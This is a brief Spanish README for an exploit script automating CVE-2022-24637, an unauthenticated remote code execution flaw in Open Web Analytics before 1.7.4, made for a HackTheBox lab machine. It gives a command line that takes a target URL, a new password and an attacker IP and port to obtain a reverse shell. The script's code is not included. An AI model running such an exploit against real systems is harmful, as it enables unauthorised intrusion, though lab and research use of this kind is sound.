
RCE sin autenticación en Open Web Analytics versión <1.7.4
RCE no autenticado en Open Web Analytics versión <1.7.4
Este script está hecho para automatizar la vulnerabilidad CVE-2022-24637. Creé este exploit para mi máquina de Hackthebox vessel. https://app.hackthebox.com/machines/Vessel
El exploit y la idea están basados en https://devel0pment.de/?p=2494
Ejecute el script con los siguientes parámetros:
python3 exploit.py http://<url>/ newPassword YourIp YourPort
Puede ser posible que necesite ejecutarlo varias veces para obtener una shell.
El script puede ser mejorado.
